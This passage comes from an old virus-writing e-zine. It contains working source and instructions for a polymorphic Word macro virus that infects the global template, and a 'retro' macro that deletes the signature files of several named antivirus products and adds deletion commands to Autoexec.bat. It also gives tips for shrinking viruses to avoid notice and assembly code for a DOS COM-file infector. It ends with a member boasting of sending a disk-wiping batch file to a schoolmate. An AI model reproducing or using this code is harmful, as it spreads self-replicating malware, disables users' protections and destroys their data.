' sort of string.>
PG$ = WindowName$() + ":" + ZU$ '<PG$ is active filename plus...
' ":" and plus macro name (ZU$).>
MacroCopy PG$, "Global:" + E$ '<Copies macro from document...
' to global template, with...
'the name that was generated.>
SetProfileString "Intl", "Name2", E$ '<Set the macro name in...
' win.ini. as "Intl", "Name2", E$.>
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = E$, .Add, .Context = 0
'<Creates short-cut with the...
' ascii keycode 69 (E). If the...
' E key is pushed the macro...
' E$ will be executed (The above...
' macro). With the .Add you tell...
' Word that you want to add that...
' function to the key not replace...
' it.>
End Sub '<End the Sub Crypt>
Sub Routine '<Begin Sub Routine>
One = 7369 '<This is practically...
Two = 9291 ' the same as Sub Crypt.>
Num = Int(Rnd() * (Two - One) + One) '<I will only explain the...
A$ = Str$(Num) ' things that aren't...
A$ = LTrim$(A$) ' explained above.>
Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
D$ = C$ + A$ '<The same as in Sub Crypt...
UZ$ = GetDocumentVar$("VirName") ' only with other names.>
GP$ = WindowName$() + ":" + UZ$
MacroCopy GP$, "Global:" + D$
SetProfileString "Intl", "Name", D$
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = D$, .Add, .Context = 0
'<This one creates a short-cut...
' with the D$ macro (this macro)...
' if the spacebar (keycode 32)...
' is pushed.>
End Sub
Sub PayloadMakro '<Same again.>
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "A"
If B$ = "2" Then C$ = "B"
If B$ = "3" Then C$ = "C"
If B$ = "4" Then C$ = "D"
If B$ = "5" Then C$ = "E"
If B$ = "6" Then C$ = "F"
If B$ = "7" Then C$ = "G"
If B$ = "8" Then C$ = "H"
If B$ = "9" Then C$ = "I"
If B$ = "10" Then C$ = "J"
If B$ = "11" Then C$ = "K"
If B$ = "12" Then C$ = "L"
If B$ = "13" Then C$ = "M"
If B$ = "14" Then C$ = "N"
If B$ = "15" Then C$ = "O"
If B$ = "16" Then C$ = "P"
If B$ = "17" Then C$ = "Q"
If B$ = "18" Then C$ = "R"
If B$ = "19" Then C$ = "S"
If B$ = "20" Then C$ = "T"
If B$ = "21" Then C$ = "U"
If B$ = "22" Then C$ = "V"
If B$ = "23" Then C$ = "W"
If B$ = "00" Then C$ = "X"
K$ = C$ + A$ '<Again another name.>
ZUZ$ = GetDocumentVar$("VirNamePayload")
GP$ = WindowName$() + ":" + ZUZ$
MacroCopy GP$, "Global:" + K$
SetProfileString "Intl", "Name3", K$ '<Only this time no...
' short-cut because this...
' is the payloadmacro and...
' this payload macro is only...
' executed on a special date...
' that is programmed in...
' another macro. For the...
' whole Outlaw virus, see...
' the virii section.>
End Sub
Function CheckInstalled '<A function to check if...
' the virus already installed...
' the global template (Normal.Dot).>
CC$ = GetProfileString$("Intl", "Name") '<CC$ is the name of the Routine...
' macro (Sub Routine).>
CheckInstalled = 0 '<Set the var checkinstalled to 0.>
If CountMacros(0) > 0 Then '<If the number of macros in...
' Normal.Dot is greater then 0,
For i = 1 To CountMacros(0) ' then create a for...next loop...
' that loops the number of macros.>
If MacroName$(i, 0) = CC$ Then '<If the macro name in...
CheckInstalled = 1 ' Normal.dot is CC$ (routine...
' macro) then set var...
' CheckInstalled to 1.>
End If '<Ends the If instruction.>
Next i '<All macros done? then...
' continue. Else go back to...
' for...next loop.>
End If '<Ends the If instruction.>
End Function '<The end of the function.>
----------------------------------------------------------------
You see this isn't as complicated as you may have thought. The only complicated thing is the saving of the macro names in the win.ini. About that, if you want to use the generated macro names in another macro, you must read the macro names from win.ini. This is done by typing:
UZ$ = GetProfileString$("Intl", "Name")
It's best to set this at the top of the macro. But if the virus contains more then two macros (Outlaw does) you must set another line in your macro. Just below the UZ$ = getprof... you type:
ZU$ = GetProfileString$("Intl", "Name2")
ZUZ$ = GetProfileString$("Intl", "Name3")
Only, be awrare if you didn't use Intl and Name1, Name2, etc. you must change the names. But now UZ$, ZU$ and ZUZ$ contains the macro names.
So you could use something like:
infDoc$ = FileName()
Macrocopy "Global:" + UZ$, InfDoc$ + ":" + generated name
This is just simple polymorfism. What you can do to improve your poly-morfism is:
- Making more generatable names
- Make sure that a name doesn't come twice
- Do not use the time to generate the first character
Making more generatable names is quite easy, because you could just make the number higher.
For example, Instead of using this:
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
You could use this:
One = 1000000
Two = 9999999
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Real simple, isn't it?
Now the second thing. How to make sure that a generated name doesn't comes twice. You could use:
One = 1000
Two = 2000
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
And for the next macro:
One = 2001
Two = 3000
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
And so on...
See? But instead of using the numbers you could also use the characters:
You could use:
Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "AA"
If B$ = "2" Then C$ = "BB"
If B$ = "3" Then C$ = "CC"
If B$ = "4" Then C$ = "DD"
If B$ = "5" Then C$ = "EE"
If B$ = "6" Then C$ = "FF"
If B$ = "7" Then C$ = "GG"
If B$ = "8" Then C$ = "HH"
If B$ = "9" Then C$ = "II"
If B$ = "10" Then C$ = "JJ"
If B$ = "11" Then C$ = "KK"
If B$ = "12" Then C$ = "LL"
If B$ = "13" Then C$ = "MM"
If B$ = "14" Then C$ = "NN"
If B$ = "15" Then C$ = "OO"
If B$ = "16" Then C$ = "PP"
If B$ = "17" Then C$ = "QQ"
If B$ = "18" Then C$ = "RR"
If B$ = "19" Then C$ = "SS"
If B$ = "20" Then C$ = "TT"
If B$ = "21" Then C$ = "UU"
If B$ = "22" Then C$ = "VV"
If B$ = "23" Then C$ = "WW"
If B$ = "00" Then C$ = "XX"
And the next time:
Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
If B$ = "1" Then C$ = "AB"
If B$ = "2" Then C$ = "BC"
If B$ = "3" Then C$ = "CD"
If B$ = "4" Then C$ = "DE"
If B$ = "5" Then C$ = "EF"
If B$ = "6" Then C$ = "FG"
If B$ = "7" Then C$ = "GH"
If B$ = "8" Then C$ = "HI"
If B$ = "9" Then C$ = "IJ"
If B$ = "10" Then C$ = "JK"
If B$ = "11" Then C$ = "KL"
If B$ = "12" Then C$ = "LM"
If B$ = "13" Then C$ = "MN"
If B$ = "14" Then C$ = "NO"
If B$ = "15" Then C$ = "OP"
If B$ = "16" Then C$ = "PQ"
If B$ = "17" Then C$ = "QR"
If B$ = "18" Then C$ = "RS"
If B$ = "19" Then C$ = "ST"
If B$ = "20" Then C$ = "TU"
If B$ = "21" Then C$ = "UV"
If B$ = "22" Then C$ = "VW"
If B$ = "23" Then C$ = "WX"
If B$ = "00" Then C$ = "XY"
So easy i'm falling asleap, tell me something i cannot think by myself!
Ok, i'll try...and now how not to use the time for generating the first character.
Instead of using:
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
Beginn = Hour(Now())
B$ = Str$(Beginn)
B$ = LTrim$(B$)
use this:
One = 7369
Two = 9291
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)
One = 0
Two = 23
Num = Int(Rnd() * (Two - One) + One)
B$ = Str$(Num)
B$ = LTrim$(B$)
I said:"TELL ME SOMETHING I CANNOT THINK BY MYSELF!!!"...
--- Neophyte ---
RETRO MACRO VIRII
This file shows you how to defeat the most known anti virus products out there. This technique isn't for using against TSR-AV products. If anyone knows or has an idea about how to defeat TSR products, e-mail me at The_Neophyte@hotmail.com
Ok, now for the real code and techniques. I will present parts of code I first used in my Puritan (1) virus. Because this is the only macro virus that uses this technique till now.
The actual working of the retro macro is that it deletes the signature from the most known AV-products, so if the AV-prog is started later you will get a message like "Virus Signatures corrupt, please reinstall the program." So the most of the not knowing people out there will reinstall the program. But if a anti virus proggie for Windows 95 is installed it will most of the time need a reboot for completing the total install. So if we put a line in Autoexec.bat such as "If exist C:\TBAV\TBscan.sig then del C:\TBAV\TBscan.sig" Ok, got the point? Now for the code:
------Autoopen Macro----------------------------------------------------
Sub MAIN
On Error Goto Z '<This must be familiar
iM = CountMacros(0, 0) ' to you.>
For i = 1 To M
If M$(i, 0, 0) = "Puritan" Then Y = - 1
End If
Next i
If Not Y Then
F$ = WindowName$()
S$ = F$ + ":Puritan"
MacroCopy S$, "Global:Puritan"
S$ = F$ + ":Rtr"
MacroCopy S$, "Global:Retro"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FileSaveAs"
S$ = F$ + ":FSAB"
MacroCopy S$, "Global:FSAB"
S$ = F$ + ":AOB"
MacroCopy S$, "Global:AOB"
S$ = F$ + ":ToolsMacro"
MacroCopy S$, "Global:ToolsMacro"
End If
ToolsMacro .Name = "Retro", .Run, .Show = 0, .Discription = "", .NewName = ""
'<This runs the macro Retro from the Normal.dot
when the Normal.dot is infected. So it will
normally will be run once every infection.>
Z:
End Sub
------Retro Macro-------------------------------------------------------
Sub MAIN
On Error Goto a '<Build in error handler.>
VF$ = "C:\Program Files\Norton AntiVirus\Virscan.Dat"
'<VF$ = Virscan.dat file>
If Files$(VF$) = "" Then Goto a '<If it doesn't exists goto a>
SetAttr VF$, 0 '<Set file attributes to none.>
Kill VF$ '<Delete VF$>
a:
On Error Goto c
AB$ = "C:\Autoexec.bat" '<AB$ = Autoexec.bat>
If Files$(AB$) = "" Then Goto c '<If it doesn't exists goto c>
SetAttr AB$, 0 '<set file attributes to none.>
Open AB$ For Append As #1 '<Open AutoExec.bat for appending
Print #1, "@echo off" the line IF exist C:\...\virscan.dat
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1 at the end of the AutoExec.bat>
c: '<Practically the same routine,
On Error Goto d onlt now with other names.>
VF$ = "C:\Program Files\F-Prot95\Fpwm32.dll"
If Files$(VF$) = "" Then Goto d
SetAttr VF$, 0
Kill VF$
d:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto f
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
f:
On Error Goto g
VF$ = "C:\Program Files\McAfee\Scan.dat"
If Files$(VF$) = "" Then Goto g
SetAttr VF$, 0
Kill VF$
g:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto h
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
h:
On Error Goto i
VF$ = "C:\Tbavw95\Tbscan.sig"
If Files$(VF$) = "" Then Goto i
SetAttr VF$, 0
Kill VF$
i:
AB$ = "C:\Autoexec.bat"
If Files$(AB$) = "" Then Goto j
SetAttr AB$, 0
Open AB$ For Append As #1
Print #1, "IF exist " + VF$ + " then del " + VF$
Close #1
J:
End Sub
------------------------------------------------------------------------
Quite simple, he?
This retro macro only works with the Win95 AV products, but if you want a more complete retro technique, that also includes the DOS and WIN 3.11 AV files, just install the AV-proggie and rename a file (Not the .exe). And run the proggie, see if it still works. And if it doesn't, you got the right file.
--- Neophyte ---
The_Neophyte@Hotmail.com
HOW TO OPTIMIZE YOUR MACRO VIRII
Ok, this one may not be very long but I think it's effective enough to put it in here.
As with every sort of virus there is a rule that if something is smaller it will go faster. With macro virii it doesn't really matter how fast the virus works because when you work on a Pentium 166 with a load of memory you will not notice the virus is even active, but there are other reasons to make your virus smaller. For instance, If your virus is 10k big and it infects a journalists network, and all the journalists together will create 250 documents in a day I'm sure somebody will notice that in 10 days the harddisk space is increased with 25 megabyte, so if you can make your virus 9k big the lost harddisk space in 10 days is only 22,5 megabytes. 2,5 megabytes with just 1k decreasement.
I hope you get the point, now I will give you a couple things to decrease your virus length with.
Never put any comments in the actual virus, I mean, don't put any comments in the virus you will spread. If you put a virus in a magazine or something, it's better to put comments in it.
----------------
Also, use as much strings as possible. I've tested it with a simple test:
Create an empty template, and create a macro in that template.
Now delete the Sub Main and End Sub commands and type a line like this:
'Welcome to the SLAM magazine issue 1, the Document X'
Then select the line and use copy and paste to copy the line for about 50 times. When that's done select all the 50 lines and use the edit-->copy command. Then save the template with the macro as 'Test1.dot'.
Then create a second empty template and also create a macro in that template and delete the Sub Main and End Sub commands. Then paste the 50 lines to the empty macro. After that use the find replace command and type at find: Welcome to the SLAM magazine issue 1, the Document X and type at replace: A$
Check to see if every line is changed in A$, then type this at the top of the macro:
A$ = "Welcome to the SLAM magazine issue 1, the Document X"
And finally save the template as Test2.dot.
Now go to dos and check the length of both files. See any differences?
And don't use long labels, see the following example:
Instead of using this:
-----------------------------------------------------------
Sub MainCheckNumber = 0
Check_CheckNumber:
If CheckNumber = 5 then goto CheckNumber_is_5 else goto Checknumber_is_not_5CheckNumber_is_not_5:
CheckNumber = CheckNumber + 1
goto Check_ChecknumberCheckNumber_is_5:
MsgBox "CheckNumber is 5", "Finished"End Main
-----------------------------------------------------------
-----------------------------------------------------------
Sub Main
CheckNumber = 0
Check_CheckNumber:
If CheckNumber = 5 then goto CheckNumber_is_5 else goto Checknumber_is_not_5
CheckNumber_is_not_5:
CheckNumber = CheckNumber + 1
goto Check_Checknumber
CheckNumber_is_5:
MsgBox "CheckNumber is 5", "Finished"
End Main
-----------------------------------------------------------
You could use this:
-----------------------------------------------------------
Sub Main
C = 0
F:
If C = 5 then goto A else goto B
B:
C = C + 1
goto F
A:
MsgBox "CheckNumber is 5", "Finished"
End Main
-----------------------------------------------------------
And with a bit thinking :) you could do this:
-----------------------------------------------------------
Sub Main
C = 0
B:
C = C + 1
If C = 5 then goto A
goto B
A:
MsgBox "CheckNumber is 5", "Finished"
End Main
-----------------------------------------------------------
You got it now? Ok, it won't make your virus more readable with it but it's smaller. And what the fuck do you care if some AV-pussy can't understand it :)
I think you can make up other things to decrease the size of your virus.
Be creative.....
--- Neophyte ---
Directory Findy
by Spider of VBB
Hi, I'm Spider, i'm new on VBB, and on this article I will talk about COM virus. Note that to understand what I will show, you MUST know assembly, and how COM files and virus works.. so, let's start of the beginning:
How COM files work
All files are divided into segments, these segments are not in order and can be load in to any place of memory... the principal difference between a COM and EXE file is that on COM files, the segment will always start at 100h!
With this in mind, it will be very simples to write a COM virus.
How COM virus work
Ok, what a virus will do is open the COM file and save the first 3 bytes, on the place of this 3 bytes, the virus will put a JMP to the end of the file and copy the rest of the virus to it... so, the virus will always run first!
After do the job, the virus will restore the original 3 byte, and load again at 100h, so the file starts again without know that there is something wrong.
A normal COM file is like this:
1 2 3
__________ ____________________ __________________
| | | |
| | | |
|__________|____________________|__________________|
Number 1 - Begining of the COM file
Number 2 - Middle of COM file
Number 3 - End of COM file
On most COM files, they are executed and loaded on this order, 1, 2, 3. When a virus infects a COM file, the COM file will look like this:
1 3 4 5 2
___ ________ ____________________ __________________ _______________
| | | | | |
|JMP| | | | VIRUS |
|___|________|____________________|__________________|_______________|
When finish the job the virus will replace the JMP("1") with the 3 bytes, and back control to the COM file!
So a simple but good virus will do this:
- 1- Find a file to fuck
- Save the atributes of the file
- Turn all file's attributes to OFF(normal file)
- Open the file for read/write
- Save the date/time of the file
- See if is already infect, if so, go to 8
- No, save the first 3 bytes, and replace it with a JMP
- Copy the rest of the virus to the end of the COM file
- Close the file
- Restore date/time/....
- Back control to the original program
- End
Now, let's take a look on a virus that will do exacly that:
;----------------------------------------------------------------------
; The Simple routine to Search for a .COM File...
;----------------------------------------------------------------------
com_files db "*.com",0 ; Mask for COM files.
mov ah, 4eh ; Point to a *.COM file...
mov dx, com_files ; Mask for COM files.
mov cx, 7 ; Any kind of file.
int 21h ;
cmp ax, 12h ; Found?!?
je exit ; No, exit...
jmp found_file ; Yes, FUCK IT!!!
; Instead of Exiting here you can make the Virus go and change dir and
; look for several other .com files else where... with the help of the
; path or simply searching for more <dir>...
found_file:
mov di, [si+file] ; DI points to the filename.
push si ;
add si, file ; SI points to filename...
mov ax, offset 4300h ; Get file attributes.
mov dx, si ; Filename in DX.
int 21h
mov file_attrib, cx ; Save file Attributes.
file dw 0 ; Here is where we save the filename.
; Now we will disable all atributes of the COM file that the virus found
mov ax, offset 4301h ; To set file attributes...
mov cx, offset 0fffeh ; Set them to a normal File.
mov dx, si ; Filename.
int 21h ;
mov ax, offset 3d02h ; Open File to Read/Write.
mov dx, si ; ASCIIZ filename.
int 21h ;
jnb ok ; If file was open continue.
jmp put_old_attrib ; Error happened restore
; old attribs and quit.
ok:
mov bx, ax ;
mov ax, offset 5700h ; Get File Date & Time...
int 21h ;
mov old_time,cx ; Save old File Time.
mov old_date,dx ; Save old File Date.
old_time db 0 ; This is the variables that we
old_date db 0 ; use to save the file's info.
; here we infect the file... but first we SAVE the first 3 bytes
; somewhere in our virus
mov ah,3fh ; Read file.
mov cx,3 ; Number of bytes to read.
mov dx,first_3 ; Save bytes in the buffer.
add dx,si ; Filename.
int 21h ;
cmp ax,3 ; Where 3 bytes read?
jnz fix_file ; If not fix file like before and quit,
first_3 equ $ ; The First three bytes of the original file!
int 20h ; The virus is infected to.
nop ;
; This moves the File pointer to the END of the file
mov ax,offset 4202h ;
mov cx,0 ;
mov dx,0 ;
int 21h ;
mov cx,ax ; DX:AX is the FILESIZE!
sub ax,3 ; Subtract three because of file pointer.
add cx,offset c_len_y ;
mov di,si ;
sub di,offset c_len_x ;
mov [di],cx ; Modifies the 2nd & 3rd bytes of program.
; The writes our virus to the file
mov ah,40h ;
mov cx,virlength ; Virus Length.
mov dx,si ; File.
sub dx,offset codelength ; Length of virus codes.
int 21h ;
cmp ax,offset virlength ; All bytes written?
jnz fix_file ; If no fix file and quit.
;Moves the file pointer to the beginning of file and write the
;3 bytes JMP at the beginning of the file
mov ax,offset 4200h ;
mov cx,0 ;
mov dx,0 ;
int 21h ;
mov ah,40h ; Write to file...
mov cx,3 ; # of bytes to write...
mov dx,si ; File name...
add dx,jump ; Point to the new JMP statement.
int 21h
jump db 0e9h ; This is the JMP that will be put in the
; Begining of the file!
;Restore Old File Time & Date
fix_file:
mov dx,old_date ; Old File Date
mov cx,old_time ; Old file Time...
and cx,offset 0ffe0h ; Flat Attribs.
mov ax,offset 5701h ;
int 21h ;
mov ah,3eh ;
int 21h ; Close file...
; Here we'll restore the old file attributes...
put_old_attrib:
mov ax,offset 4301h ;
mov cx,old_att ; Old File Attributes.
mov dx,si ; Filename...
int 21h ;
;----------------------------- EnD -------------------------------------
Anyhow that's it... Simple no? This source was also used in ParaSite ][ of Rocky Steady and is STILL undetectable to date with Scanv85. Note that this code have lot's of Errors checks, this is very good, but if your virus need to have a minimum size, it better don't use this checks. Remember that COM files can have only 64k! So create a test to know if your virus can fuck the file, because if the file have 60k, and the virus 5k, the virus will just crash file!!
Anyhow theres still work to be done, like you must restore the old data file so it will jump to 100h and run the old file the virus was infected too! Remember to store them in the beginning and then restore them! Anyhow there's a few Variables to be put in like `VirLength' which you should know how to do that also the `CodeLength' that is the VIRUS codes ONLY not counting the Stacks.
On next article, I will show a complete COM virus, and some others tricks to avoid detection by AV(Anti-Virus LAMER!!).
Spider
Part 2
This is a little lamer, but I have seen this just 3 or 4 times on virus, I am talking about find directories to fuck... instead of look for files, the virus will look for other directories... Well, I invented a little big function to do that that took me 2 weeks of research and tests... take a look, I think that is possible to decrease the size of the function, but it's up to you... fill free to change everything yo want on this peace of code:
Start:
call GET_DTA ; Get proper DTA address in DX.
push dx ; Save it.
mov ah,1AH ; Set DTA.
int 21H
mov ah, 04eh ; Search for first subdirectory
mov cx, 00010001b ; Dir mask
lea dx, maske_dir ;
int 21h ;
jc Erro ;
pop bx ; Get pointer to search table (DTA)
test BYTE PTR [bx+15H], 00010001b ; Is this a directory?
jz Find_next ; No, find next
cmp BYTE PTR [bx+1EH],'.' ; Is it a subdirectory header?
jne Real ; No, it's a real directory!!
GET_DTA: ;
mov dx,OFFSET DTA2 ;
mov al,2BH ;
add dx,ax ; Return with dx= proper dta offset
ret ;
DTA2 db 56H dup (?) ;dta for directory finds (2 deep)
maske_dir db "*",00 ; search dir's
It's very simple... know you can right real cool virus!! He he, if you find a best way of do this kind of search.. please, tell me ok?!? See ya..
Spider
My e-mail: mgl@merconet.com.br
VBB IS EXPANDING!
In the future, VBB will not only serve virus writers, but hackers and phreakers, too! We will add a hacking division under Liquid Cools(lcool@juno.com) leadership! Liquid Cool will be responsible for recruiting new people and managing the division. In case you don't know him yet, here's a small rundown on him written by himself:
About a year or two ago my partner ( Dark Fierce ) and I decided to start a group. We really hate America Online. So that was our prime target. We started getting talented members in our group. It was I, Dark Fierce, Acid Fallout, Coals of Fire, and Darth Vader. A week or two later we started to notice that Darth Vader wasn't doing shit so we kicked him out. He didn't know shit about hacking or phreaking. He started his own group called Laser Tag. It was nothin but people who didn't know shit. There was a kid from my school in the group and I knew his e-mail address. So I sent him a simple batch file that deleted everything on his hd. I wanted to see if he was smart enough to look at it through EDIT... he wasn't. I told him the program would hack him into any computer. He ran the program and got fuct. Eventually they found out it was me. We also got busted a little while later.
Dark Fierce and I started a new group. KnightZ oF HeLL. I wrote a magazine for the group. I put my e-mail address in the mag for questions that people had. Some kid that lives by me got a copy and showed it to everyone, including his mom, he knew and told them I wrote it. Now it was only the first issue so it didn't have anything too bad in it. That was the second time. Just recently I got busted because I was on Telnet scanning NUA's ( Network User Address ) when I mistyped an NUA. What I typed in was a code for NASA'S PACKET SWITCHING SYSTEM. I was fooling around with it for a few weeks, until I got busted. The code that I typed in is still working today. That was the third reason. Dark Fierce stopped hacking and went to programming in Visual Basic. I still do everything that I used to do.
Liquid Cool